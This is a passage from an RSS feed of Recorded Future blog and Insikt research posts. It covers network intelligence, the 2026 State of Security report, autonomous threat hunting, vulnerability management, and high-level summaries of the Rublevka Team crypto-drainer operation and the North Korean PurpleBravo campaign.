        <p>Network intelligence integrates directly into existing security workflows through API access to SIEMs, SOAR platforms, and custom analysis tools. When your SIEM flags suspicious traffic, automated queries reveal global context: Is this IP conducting C2 communications? Scanning your sector specifically? Connected to infrastructure from last month's campaign? Curated threat lists reduce noise from legitimate security research while enabling early blocking of targeted reconnaissance, turning your existing tools into instruments for active investigation rather than passive alerting.</p>
        <h2>When Expertise Becomes Essential</h2>
        <p>For organizations facing persistent, sophisticated adversaries, network intelligence capabilities alone aren't sufficient. The difference between having access to global network visibility and operationalizing it effectively comes down to tradecraft.</p>
        <p>Recorded Future's Global Network Intelligence Advisory program addresses this by pairing technical capabilities with forward-deployed analysts and embedded engineers who work directly inside your SOC or intelligence fusion center. This becomes especially critical when nation-states are mapping your critical infrastructure, when advanced persistent threats are staging for long-term access, or when attribution could influence strategic decision-making. You need the ability to investigate specific questions with global visibility and the expertise to interpret what you find.</p>
        <h2>The Compliance Framework That Enables Trust</h2>
        <p>Network intelligence operates under strict ethical and legal guidelines. All use is subject to our Acceptable Use Policy, and surveillance, profiling of individuals, or political targeting is prohibited. Access is invitation-only, requiring vetting and agreement to specific terms of use.</p>
        <p>These aren't just policies; they are foundational to how this capability operates. The metadata-only collection model, the data minimization approach, and the geographic distribution that prevents any single point of visibility into user communications are design choices. These constraints aren't obstacles to effectiveness but enablers of trust. They allow powerful intelligence capabilities to exist while promoting appropriate boundaries.</p>
        <h2>Moving Forward</h2>
        <p>The gap between what most security programs need and what traditional threat intelligence provides continues to widen. Adversaries operate at scale, evolving infrastructure faster than feeds can update. Internal telemetry shows only what touches your perimeter. Point-in-time observations lack the context to distinguish targeted attacks from noise.</p>
        <p>Network intelligence addresses this gap with the ability to query global visibility using your own selectors. At Recorded Future, we've developed capabilities that operate at this scale, with the compliance framework and operational expertise to make them effective. For organizations ready to move beyond pre-packaged feeds, we're offering these capabilities to select customers through an invitation-only program.</p>
        <p>What matters now is recognizing that your questions matter more than their answers and building security programs that reflect that reality.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_188ef07891988f2f97aad055a1f5a7c089fb55765.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[State of Security Report | Recorded Future]]></title>
            <link>https://www.recordedfuture.com/research/state-of-security</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/state-of-security</guid>
            <pubDate>Thu, 12 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Download Recorded Future's 2026 State of Security report which provides comprehensive threat intelligence on geopolitical fragmentation, state-sponsored operations, ransomware evolution, and emerging technology risk.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Fragmentation is the new normal</h2>
              <p>The global threat landscape didn't simplify in 2025—it shattered. Geopolitical alliances strained. Criminal enterprises splintered and regrouped. State-sponsored actors shifted from dramatic disruptions to quiet pre-positioning. And as long-established norms unwound, convergence across once-distinct domains created unprecedented uncertainty.</p>
              <p>The 2026 State of Security report delivers Insikt Group's most comprehensive annual analysis of the forces shaping global security—helping leaders reduce surprise, prioritize effectively, and act with confidence.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_188a8fbb5001e358d9837adb14d5fb0897434527c.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Fragmentation Defined 2025's Threat Landscape. Here's What It Means for 2026]]></title>
            <link>https://www.recordedfuture.com/blog/fragmentation-in-2025-what-it-means-for-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/fragmentation-in-2025-what-it-means-for-2026</guid>
            <pubDate>Thu, 12 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[The global threat landscape didn't simplify in 2025 — it shattered. The 2026 State of Security report represents Insikt Group's most comprehensive threat intelligence analysis to date, drawing on proprietary intelligence, network telemetry, and deep geopolitical research to help you stay ahead of converging threats.]]></description>
            <content:encoded><![CDATA[
        <p>Uncertainty has become the operating environment for business. And this year, fragmentation is driving it.</p>
        <p>The global threat landscape didn't simplify in 2025; it shattered. Geopolitical alliances strained. Criminal enterprises splintered under law enforcement pressure, then regrouped into smaller, faster, and harder-to-track operations. State-sponsored cyber actors shifted from dramatic disruptions to quiet pre-positioning, embedding themselves in networks and waiting. Hacktivist groups and influence networks amplified conflicts, blurring the line between genuine intrusions and perception warfare.</p>
        <p>But here's what makes this moment dangerous: as long-established norms unwind, fragmentation is paradoxically enabling greater interoperability across domains that were once distinct. State objectives, criminal capability, and private-sector technology increasingly reinforce one another. That convergence creates uncertainty, compresses warning time, and expands plausible deniability.</p>
        <p>Today, Recorded Future's Insikt Group releases the <strong><a href="https://www.recordedfuture.com/research/state-of-security">2026 State of Security</a></strong> report, our most comprehensive annual analysis of the forces shaping global security.</p>
        <p>Drawing on proprietary intelligence, network telemetry, and deep geopolitical analysis, this report examines how 2025's fractures are reshaping the threat environment — and what security leaders must prepare for in the year ahead.</p>
        <h2>The End of Stability as a Baseline Assumption</h2>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_10c922a3a2103e396f22a400e3135d81ce6b0f02b.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1220" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>2025 redefined international relations (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_14120f6481cb46917d75b8ece722dda331953c861.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[From 27 Steps to 5: How Recorded Future Reimagined Threat Hunting with Autonomous Threat Operations]]></title>
            <link>https://www.recordedfuture.com/blog/threat-hunting-27-steps-to-5</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/threat-hunting-27-steps-to-5</guid>
            <pubDate>Wed, 11 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how Autonomous Threat Operations reduces 27 manual steps to as few as 5 largely automated ones, delivering the speed, scale, and effectiveness that the modern threat landscape demands.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>The manual operations gap can be a business risk</li>
                <li>Manual threat hunting requires 27 steps that burn analyst time</li>
                <li>Autonomous Threat Operations can reduce 27 steps to 5</li>
                <li>Autonomous operations prove measurable ROI</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1d6aff1dc009c244e9b6f66a1f1fe7bd44e4b681f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Rublevka Team: Anatomy of a Russian Crypto Drainer Operation]]></title>
            <link>https://www.recordedfuture.com/research/rublevka-team-anatomy-russian-crypto-drainer-operation</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/rublevka-team-anatomy-russian-crypto-drainer-operation</guid>
            <pubDate>Wed, 04 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Rublevka Team exemplifies the industrialization of crypto scams. Learn how traffer teams and wallet drainers enable high-volume theft.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group has identified a major cybercriminal operation specializing in large-scale cryptocurrency theft, operating under the moniker “Rublevka Team”. Since its inception in 2023, the threat group has generated over $10 million through affiliate-driven wallet draining campaigns. Rublevka Team is an example of a “traffer team,” composed of a network of thousands of social engineering specialists tasked with directing victim traffic to malicious pages. Unlike traditional malware-based approaches such as those used by the traffer teams Marko Polo and CrazyEvil (previously identified by Insikt Group, both of which distributed infostealer malware), Rublevka Team deploys custom JavaScript scripts via spoofed landing pages that impersonate legitimate crypto services, tricking victims into connecting their wallets and authorizing fraudulent transactions. Their infrastructure is fully automated and scalable, offering affiliates access to Telegram bots, landing page generators, evasion features, and support for over 90 wallet types. By lowering the technical barrier to entry, Rublevka Team has built an extensive ecosystem of global affiliates capable of launching high-volume scams with minimal oversight.</p>
        <p>This structure poses a growing threat to cryptocurrency platforms, fintech providers, and brands whose identities are being impersonated. Organizations that facilitate blockchain transactions, particularly fintech firms, exchanges, or wallet providers, face elevated reputational and legal risks if customers fall victim to these scams. Even if the victim’s compromise occurs outside a firm’s platform, failure to detect spoofed landing pages or fraudulent referrals can trigger consumer backlash, loss of trust, or regulatory scrutiny around customer protections and Know Your Customer (KYC) enforcement. The threat group’s agility — evidenced by its use of frequently rotating domains, targeting lower-cost chains like Solana (SOL), and exploiting Remote Procedure Call (RPC) APIs — undermines traditional fraud detection and domain takedown efforts. Their model mirrors ransomware-as-a-service (RaaS) operations, signaling a continuation of the broader shift toward scalable, service-based cybercrime that organizations must proactively monitor, disrupt, and defend against to protect customers and maintain trust.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>The objective of a Rublevka Team scam is to create an attractive SOL-based offer, such as a promotion or an airdrop event, generate traffic to the lure via social media or advertisements, and trick a user into connecting their wallet to the website and signing a transaction that drains their wallet.</li>
          <li>As of writing, Rublevka Team’s primary Telegram channel has approximately 7,000 members. Over 240,000 messages have been posted to Rublevka Team’s automated “profits” channel, indicating at least 240,000 successful wallet drains, with transactions ranging from $0.16 to over $20,000.</li>
          <li>Rublevka Team offers a custom JavaScript drainer embedded into their landing pages, which exfiltrates victims’ SOL assets by draining held tokens. The drainer is compatible with over 90 SOL wallet types.</li>
          <li>The threat group’s infrastructure is fully automated via Telegram bots, offering affiliates tools for landing page creation, campaign tracking, cloaking, and distributed denial-of-service (DDoS) protection.</li>
          <li>The drainer campaign, active since 2023, leverages spoofed versions of legitimate services such as Phantom, Bitget, and Jito to maximize user trust and conversion.</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_1f21796732ee17098dc9eae5148e093dc47d7f9de.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team | Recorded Future]]></title>
            <link>https://www.recordedfuture.com/blog/autonomous-threat-operations-in-action</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/autonomous-threat-operations-in-action</guid>
            <pubDate>Sun, 01 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article explores how Recorded Future served as Customer Zero for Autonomous Threat Operations, testing the new solution within our own SOC to validate its real-world impact before releasing it to the public. The article reveals how the technology transformed inconsistent, analyst-dependent threat hunting into unified, automated operations—enabling junior analysts to run 15–20 hunts weekly and allowing our CISO to launch comprehensive network hunts in five minutes in response to critical threats like Salt Typhoon. By understanding these outcomes, security leaders can see how autonomous threat hunting empowers teams at every skill level to shift from reactive to proactive defense.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways:</h2>
        <ul>
          <li>Recorded Future deployed Autonomous Threat Operations within its own SOC before customer release, ensuring real-world effectiveness and identifying critical capabilities.</li>
          <li>Autonomous Threat Operations reduced analyst-dependent, inconsistent processes, creating standardized hunts that deliver the same input, output, and expectations every time.</li>
          <li>Team members now run 15-20 threat hunts weekly—work that previously required days or weeks of manual research, coordination, and planning.</li>
          <li>During the Salt Typhoon campaign, Recorded Future's CISO launched a comprehensive network-wide threat hunt in five minutes between meetings, enabling immediate risk mitigation.</li>
          <li>A single pane of glass eliminates context-switching across multiple tools, allowing analysts to hunt threats and research IOCs within one platform.</li>
        </ul>
        <h2>Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team</h2>
        <p>The ultimate test of any cybersecurity solution Recorded Future builds? Using it to defend our own network.</p>
        <p>That's exactly what we did with Autonomous Threat Operations. Before rolling it out to customers, we became Customer Zero, deploying the technology within our security operations organization to see if it could truly transform the way security teams hunt for threats.</p>
        <p>The results exceeded our expectations. What we discovered wasn't just incremental improvement; it was a fundamental shift in what our security team could accomplish.</p>
        <h2><strong>The challenge: Inconsistent and analyst-dependent threat hunting</strong></h2>
        <p>Prior to implementing Autonomous Threat Operations, we faced the same threat hunting challenges many security teams struggle with today. As Josh Gallion, Recorded Future's Incident Response Manager, explains: "Before using Autonomous Threat Operations, our approach to threat hunting was more piecemeal and unique to each analyst. It varied based on whatever they were comfortable with and however they were trained on the tooling."</p>
        <p>This inconsistency meant that the quality and thoroughness of our threat hunts varied significantly by analyst. And since each team member had different strengths, different levels of experience, and different comfort levels with our security tools, we struggled to standardize the process.</p>
        <h2><strong>The transformation: Unified, repeatable threat hunting</strong></h2>
        <p>Autonomous Threat Operations leveled the playing field immediately. "It unifies the hunting capability and makes it so that every time analysts run a hunt, it's the same," says Gallion. "We get the same input, we get the same output, and we know what to expect."</p>
        <p>The implementation was remarkably straightforward. "When we turned it on, it just was a simple connection to our Splunk environment," he says. "And once the team started using it, we could see an increase in the number of threat hunts each user would do."</p>
        <p>Perhaps most importantly, Autonomous Threat Operations enabled our team to shift from reactive, manual hunting to proactive, automated operations. "Now we can schedule hunts that will continuously run over time, update with the threat actor TTPs, and give us a more holistic view," Gallion says. "Before, we had to have an analyst get back into the product and look for new IOCs to run. Now it just runs it automatically and we know that that's taken care of."</p>
        <h2><strong>Real-world impact: Upskilling junior analysts and enabling rapid response</strong></h2>
        <p>According to Recorded Future's CISO, Jason Steer, the true value of Autonomous Threat Operations became clear through two significant outcomes.</p>
        <p>First, the technology dramatically upskilled our junior staff. In traditional manual workflows, preparing to run a single threat hunt could take days or even weeks—requiring extensive research, coordination, and planning.</p>
        <p>Today, our junior analysts are running 15–20 threat hunts each week to identify high-priority threats. This isn't just about quantity; it's about empowering less experienced team members to contribute meaningfully to our defense posture while accelerating their professional development.</p>
        <p>Gallion sees this impact firsthand. "We have newer analysts who can do more advanced hunting based on IOCs, and it does it for them automatically in the background," he says. "We get our results, and then they can do research in the app to shore up the findings."</p>
        <p>Second, the speed and accessibility of automated threat hunting has proven invaluable during critical moments. When Steer read about Salt Typhoon making its way into corporate networks, he didn't need to schedule a meeting, assemble a team, or wait for the next sprint cycle. In the five minutes between meetings, he was able to launch a comprehensive threat hunt across Recorded Future's entire network to identify and mitigate associated risks to our systems.</p>
        <p>That kind of rapid response would have been impossible with manual processes—and in today's threat landscape, that speed can mean the difference between containment and catastrophe.</p>
        <h2><strong>The advantage of a single pane of glass</strong></h2>
        <p>Another key benefit emerged around workflow efficiency. "Having a single pane of glass makes it a lot easier for an analyst to do not just the threat hunt, but also to see the meaning behind the IOCs that they're pulling back into the app," says Gallion. "Analysts don't like to have to get into a whole bunch of different applications. If we don't have to, it speeds things up and we can add context from inside the app."</p>
        <p>This unified approach has eliminated the context-switching and tool-juggling that had often slowed down our security team and led to missed findings.</p>
        <h2><strong>Why the Customer Zero experience matters</strong></h2>
        <p>Serving as Customer Zero validated what we believed Autonomous Threat Operations could deliver to every customer: consistent, repeatable threat hunting that empowers analysts of all skill levels to defend their organizations more effectively. By testing the new solution within our own security operations first, we were able to identify what works, refine the capabilities that matter most, and prove that Autonomous Threat Operations isn't just a theoretical improvement—it's a practical solution that transforms daily security operations.</p>
        <p>Gallion sums it up this way: "Some of the aspects of Autonomous Threat Operations that'll have the biggest impact are the repeatability, the scheduling of threat hunts to happen over time, and the single pane of glass that allows analysts to research IOCs in the app without having to go into multiple tools."</p>
        <p>We saw a need for Autonomous Threat Operations, so we built it. Being Customer Zero enabled us to test it, refine it, and ensure that it’s the best possible solution to help our customers enter the era of the autonomous SOC.</p>
        <p><strong>Learn more about Autonomous Threat Operations by clicking</strong> <strong><a href="https://www.recordedfuture.com/products/autonomous-threat-operations">here</a>, or start operationalizing your threat intelligence now by booking a</strong> <strong><a href="https://go.recordedfuture.com/ato-demo.html?__utma=150831654.1091255729.1769524153.1769524153.1769524153.1&amp;__utmb=150831654.0.10.1769524153&amp;__utmc=150831654&amp;__utmx=-&amp;__utmz=150831654.1769524153.1.1.utmcsr=(direct)%7Cutmccn=(direct)%7Cutmcmd=(none)&amp;__utmv=-&amp;__utmk=14649591">custom demo</a>.</strong></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1a3ded09023847b846727759f0086351655ddf92a.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[PurpleBravo’s Targeting of the IT Software Supply Chain]]></title>
            <link>https://www.recordedfuture.com/research/purplebravos-targeting-it-software-supply-chain</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/purplebravos-targeting-it-software-supply-chain</guid>
            <pubDate>Wed, 21 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how PurpleBravo, a North Korean threat group, exploits fake job offers to target software supply chains, using RATs and infostealers like BeaverTail.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>PurpleBravo is a North Korean state-sponsored threat group that overlaps with the “Contagious Interview” campaign first documented in November 2023. It targets software developers, especially in the software development and cryptocurrency verticals, via fake recruiter outreach, interview coding tests, and ClickFix prompts. Activity throughout 2025 has linked multiple fraudulent LinkedIn personas to PurpleBravo through malicious GitHub repositories and fictitious lure brands. The group’s tool set includes BeaverTail (a JavaScript infostealer and loader) and multi-platform remote access trojans (RATs), specifically, PyLangGhost and GolangGhost, optimized for stealing browser credentials and cryptocurrency wallet information.</p>
        <p>Based on Recorded Future® Network Intelligence, Insikt Group identified 3,136 individual IP addresses concentrated in South Asia and North America linked to likely targets of PurpleBravo activity from August 2024 to September 2025. Twenty potential victim organizations were observed across the AI, cryptocurrency, financial services, IT services, marketing, and software development verticals in Europe, South Asia, the Middle East, and Central America. In several cases, it is likely that job-seeking candidates executed malicious code on corporate devices, creating organizational exposure beyond the individual target. Insikt Group observed PurpleBravo administering command-and-control (C2) servers via Astrill VPN and from IP ranges in China, with BeaverTail and GolangGhost C2 servers hosted across seventeen distinct providers.</p>
        <p>Insikt Group distinguishes PurpleBravo (Contagious Interview) from PurpleDelta (North Korean IT workers) but has documented meaningful intersections. This includes a likely PurpleBravo operator displaying activity consistent with North Korean IT worker behavior, IP addresses in Russia linked to North Korean IT workers communicating with PurpleBravo C2 servers, and administration traffic from the same Astrill VPN IP address associated with PurpleDelta activity.</p>
        <p>PurpleBravo presents an overlooked threat to the IT software supply chain. Because many targets are in the IT services and staff-augmentation industries with large public customer bases, compromises can propagate downstream to their customers. This campaign poses an acute software supply-chain risk to organizations that outsource development, particularly in regions where PurpleBravo concentrates its fictitious recruitment efforts.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>PurpleBravo employs a combination of fictitious personas, organizations, and websites to distribute malware to unsuspecting job seekers in the software development industry. Candidates sometimes use their corporate devices, thereby compromising their employers' security.</li>
          <li>PurpleBravo uses a variety of custom and open-source malware and tools in its operations, including BeaverTail, InvisibleFerret, GolangGhost, and PyLangGhost.</li>
          <li>Using Recorded Future Network Intelligence, Insikt Group identified 3,136 individual IP addresses linked to likely targets of PurpleBravo activity and twenty potential victim organizations in the AI, cryptocurrency, financial services, IT services, marketing, and software development industries.</li>
          <li>Insikt Group has observed multiple points of overlap between PurpleBravo and PurpleDelta, Recorded Future’s designation for North Korean IT workers, indicating that some individuals may be active in both operations.</li>
          <li>PurpleBravo’s heavy targeting of the IT and software development industries in South Asia presents an overlooked and acute supply-chain risk to organizations that contract or outsource their IT services work.</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_1bf59fb2748dede14af5b52ad8cb001808918b07e.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Threat and Vulnerability Management in 2026]]></title>
            <link>https://www.recordedfuture.com/blog/threat-and-vulnerability-management</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/threat-and-vulnerability-management</guid>
            <pubDate>Fri, 16 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Understand the future of threat and vulnerability management (TVM). Learn what TVM is, why traditional tools fail, and how intelligence is essential in today’s landscape.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways:</h2>
        <ul>
          <li><strong>Traditional vulnerability management tools can no longer keep up</strong> with the speed of modern exploitation—threat context is now mandatory.</li>
          <li><strong>Threat and Vulnerability Management (TVM) systems</strong> unify asset discovery, vulnerability data, and real-time external threat intelligence to prioritize real risk.</li>
          <li><strong>Static CVSS scores fail to reflect exploitation likelihood</strong>; intelligence-driven, dynamic risk scoring is essential in 2026.</li>
          <li><strong>Organizations that integrate vulnerability intelligence and attack surface intelligence reduce remediation time and security waste</strong>, enhancing detection and remediation while reducing alert fatigue.</li>
        </ul>
        <h2>Why Threat and Vulnerability Management Must Evolve in 2026</h2>
        <p>Security teams currently find themselves at a crossroads. Year over year, CVE volumes continue to surge. Exploitation is faster, more automated, and more targeted, meaning attacks are growing in volume, velocity, and sophistication alike. As a result, security teams are expected to “patch faster” with fewer resources and can no longer realistically keep up with this ever-rising tide of threats.</p>
        <p>Thanks to these forces, security teams have found themselves in a state of affairs in which vulnerability management has become an exercise in sheer volume, not risk. Day in and day out, teams are overwhelmed by alerts that lack real-world context, making it all but impossible to assess the actual degree of risk.</p>
        <p>Thankfully, there is a solution. Threat-informed vulnerability management (TVM) has emerged to counteract this trend, enabling security teams to intelligently address weaponized vulnerabilities, zero-day exploits, and supply chain and cloud-native risk. All this comes along with much-needed relief from creeping alert fatigue.</p>
        <p>In 2026, effective cybersecurity programs will be defined not by how many vulnerabilities they detect but by how precisely they understand, prioritize, and neutralize real threats using <a href="https://www.recordedfuture.com/threat-intelligence">intelligence-driven TVM systems</a>.</p>
        <h2>The Core Problem: Alert Fatigue and Prioritization Failure</h2>
        <p>As it stands today, the explosion in disclosed vulnerabilities (CVEs) has outpaced humans’ abilities to triage and manage patching effectively. Today, the vast majority of organizations are incapable of remediating more than a fraction of the total identified issues affecting the ecosystem.</p>
        <p>Traditionally, using a standard CVSS (Common Vulnerability Scoring System) was enough to overcome these <a href="https://www.recordedfuture.com/blog/addressing-the-vulnerability-prioritization-challenge">challenges of prioritization</a>. CVSS is an open, standardized framework used to assess the severity of security vulnerabilities by assigning a numerical score based on factors like exploitability, impact, and scope. Organizations use CVSS scores to prioritize remediation and compare vulnerabilities consistently across systems and vendors.</p>
        <p>However, CVSS only measures theoretical severity, not exploitation likelihood. It misses critical pieces of context for prioritization decisions such as:</p>
        <ul>
          <li>Is exploit code available?</li>
          <li>Is the vulnerability actively exploited?</li>
          <li>Are threat actors discussing or operationalizing it?</li>
        </ul>
        <p>As a result, high-severity CVEs that pose little real-world risk continue to consume time and resources, leading us back once again to the issue of alert fatigue and the inability to effectively triage and patch the most pressing vulnerabilities.</p>
        <p>At the same time, we are seeing modern organizations struggle with a “silo problem,” in which security, IT, and CTI (cyber threat intelligence) teams operate independently and with limited visibility and collaboration between one another. In many organizations, each of these teams ends up using different tools, establishing different priorities, sharing findings infrequently if at all, and adopting entirely different “risk languages” through which they understand, prioritize, and address threats.</p>
        <p>Taken broadly, this leaves organizations woefully lacking a unified, intelligence-driven view of risk. Without one, many adopt a de facto policy of “patch everything,” which comes with significant costs, including:</p>
        <ul>
          <li>Operational drag and burnout</li>
          <li>Delayed remediation of truly dangerous vulnerabilities</li>
          <li>Increased business risk despite increased effort</li>
          <li>Fractured security operations</li>
        </ul>
        <p>Both individually and in the aggregate, these side effects come at a significant detriment to organizational security, and as the number and diversity of CVEs continue to expand, that cost grows with them. Moving forward, organizations must find a better way.</p>
        <h2>The Evolving Threat Landscape Demands a New Approach</h2>
        <p>Today’s ever-changing landscape means that organizations must evolve along with it or risk falling dangerously behind. The rise of rapidly weaponized vulnerabilities (i.e., known software weaknesses that have moved beyond disclosure and into active attacker use) reflects a fundamental shift in how quickly and deliberately adversaries turn CVEs into operational threats. Today, the gap between disclosure, proof-of-concept release, and active exploitation has collapsed from months to days (or even hours), driven largely by exploit marketplaces, automated scanning, and widely shared tooling.</p>
        <p>Attackers increasingly prioritize vulnerabilities that are easy to exploit, broadly applicable across cloud services, edge devices, and common dependencies, and capable of delivering fast returns. Once weaponized, these vulnerabilities manifest not as theoretical risk but as active intrusion campaigns, ransomware operations, and opportunistic internet-wide exploitation, making threat context essential for distinguishing true danger from background noise.</p>
        <p>At the same time that weaponization is accelerating, attack surfaces are expanding and fragmenting across hybrid and multi-cloud environments, a trend worsened by SaaS sprawl, shadow IT, and third-party and supply chain exposure. In this environment, it is absolutely critical that security teams have a clear understanding of vulnerabilities vs. threats, and work to establish an <a href="https://www.recordedfuture.com/blog/threat-intelligence-and-vulnerability-management">integrated approach</a> between the two.</p>
        <p>In short, a vulnerability is a technical weakness, while a threat is an actor, campaign, or event at work exploiting that weakness. In order to be truly effective, modern threat and vulnerability management (TVM) systems must merge both concepts to reflect real risk and separate signal from noise.</p>
        <h2>What Is Threat and Vulnerability Management (TVM)?</h2>
        <p>Threat and Vulnerability Management (TVM) — also called Threat-Informed Vulnerability Management — is a continuous, intelligence-driven process that prioritizes remediation based on three core variables:</p>
        <ul>
          <li>Active exploitation</li>
          <li>Threat actor behavior</li>
          <li>Asset criticality</li>
        </ul>
        <p>TVM differs from traditional vulnerability management (VM) in a number of critical ways. Traditional VM relies on periodic scans, static severity scoring, and a largely reactive patching process. TVM, on the other hand, employs continuous monitoring, external threat intelligence enrichment, and closed-loop remediation and validation.</p>
        <p>This continuous, context-rich approach is foundational for modern security programs. Rather than inundating security teams with decontextualized CVEs and indiscriminate patching, modern TVM systems align security efforts with attacker reality. Reactive patching is replaced with proactive, risk-based decision-making, and as a result, organizations are able to reduce noise while simultaneously increasing the impact of their security operations.</p>
        <h2>The Five Core Pillars of Modern TVM Systems</h2>
        <p>As the speed and breadth of today’s threats continue to grow, traditional VM, being fundamentally reactive in nature, is no longer enough to keep up. In a world where new vulnerabilities are disclosed every day, TVM offers much-needed efficiency, intelligence, and proactiveness. However, not all TVM systems are created equal. Here are five core pillars of effective modern TVM systems to help you evaluate and assess solutions on the market.</p>
        <p><strong>1. Continuous Asset Discovery &amp; Inventory</strong></p>
        <p>Modern TVM systems are invaluable in that they provide full visibility across the entirety of an organization’s growing and fragmented attack surface. This includes external-facing assets, shadow IT, and cloud and SaaS environments alike. By providing continuous asset discovery and a timely, up-to-date inventory of one’s assets, TVM systems allow for real-time, comprehensive, attack-surface management.</p>
        <p>Remember, you can’t defend what you can’t see. That’s why attack surface management (ASM) is a prerequisite for effective TVM. Without accurate, up-to-date asset inventories, vulnerability data is incomplete and misleading. Continuous discovery ensures defenders see their environment the way attackers do.</p>
        <p><strong>2. Vulnerability Assessment &amp; Scoring</strong></p>
        <p>TVM goes beyond internal scanning tools to identify vulnerabilities exposed to the internet and reassess them continuously as environments change. This includes tracking misconfigurations, outdated services, and newly introduced exposure, not just known CVEs.</p>
        <p><strong>3. External Threat Context Enrichment</strong></p>
        <p>This is where TVM fundamentally diverges from legacy approaches. External threat intelligence enriches vulnerability data with insight from dark web and criminal forums, exploit marketplaces, malware telemetry, and active attack campaigns.</p>
        <p>Vulnerabilities are mapped to known threat actors, active exploitation, and <a href="https://attack.mitre.org/">MITRE ATT&amp;CK®</a> techniques, ultimately transforming raw findings into actionable intelligence.</p>
        <p><strong>4. Risk-Based Prioritization (RBVM)</strong></p>
        <p>Risk-based vulnerability management prioritizes issues based on the probability of exploitation, asset importance, and threat actor interest. This shifts the focus from “most severe” to “most dangerous,” enabling teams to address the vulnerabilities that pose the greatest immediate risk to their organizations.</p>
        <p><strong>5. Automated Remediation &amp; Verification</strong></p>
        <p>Modern TVM integrates directly with IT and SecOps workflows, pushing prioritized findings into ticketing and automation platforms. Just as importantly, it verifies remediation to confirm that patches were applied and exposure was actually reduced, creating a continuous feedback loop.</p>
        <p>These five pillars of effective TVM systems come together to create a whole that is greater than the sum of its parts. These systems, unlike their predecessors, are designed to continuously monitor and triage real threats and vulnerabilities in context and ensure awareness and proactive mitigation without the risk of burnout and alert fatigue.</p>
        <h2>Stop Patching Everything — Use Intelligence to Prioritize Real Risk</h2>
        <p>The scale of the CVE problem is overwhelming. Tens of thousands of vulnerabilities are disclosed each year, yet only a small fraction are ever exploited in the wild. Treating them all as equally urgent is not just inefficient — it’s dangerous.</p>
        <p>Vulnerability intelligence changes the equation by tracking a CVE across its full lifecycle, from initial disclosure to weaponization, exploitation, and criminal adoption. This enables dynamic risk scoring that reflects real-world conditions rather than static assumptions.</p>
        <p>Dynamic risk scoring incorporates evidence of active exploitation, availability of exploit code, dark web chatter, and threat actor interest. As conditions change, so does the risk score, ensuring prioritization remains aligned with attacker behavior.</p>
        <p>The operational impact is significant. Security teams can focus remediation on the top 1% of vulnerabilities that pose immediate risk, respond faster, reduce operational cost, and strengthen overall security posture.</p>
        <h2>See Your Risk Like an Attacker: The Full Attack Surface View</h2>
        <p>In today’s threat landscape, security teams must recast the way they envision their roles. Rather than operating in a reactive, defensive manner at all times, security teams should think more like their adversaries, taking a complete view of their attack surface and leveraging modern tools and technologies to ensure intelligent, prioritized defenses. The following three key concepts will help you take on that mentality.</p>
        <ol>
          <li><strong>The Visibility Gap:</strong> Unknown assets create unknown risk. Traditional scanners often miss orphaned domains, misconfigured cloud services, and forgotten infrastructure — precisely the assets attackers look for first.</li>
          <li><strong>Attack Surface Intelligence Explained:</strong> Attack surface intelligence provides continuous mapping of domains, IPs, cloud assets, and external services. It identifies exposures attackers see before defenders do, enabling proactive remediation rather than reactive cleanup.</li>
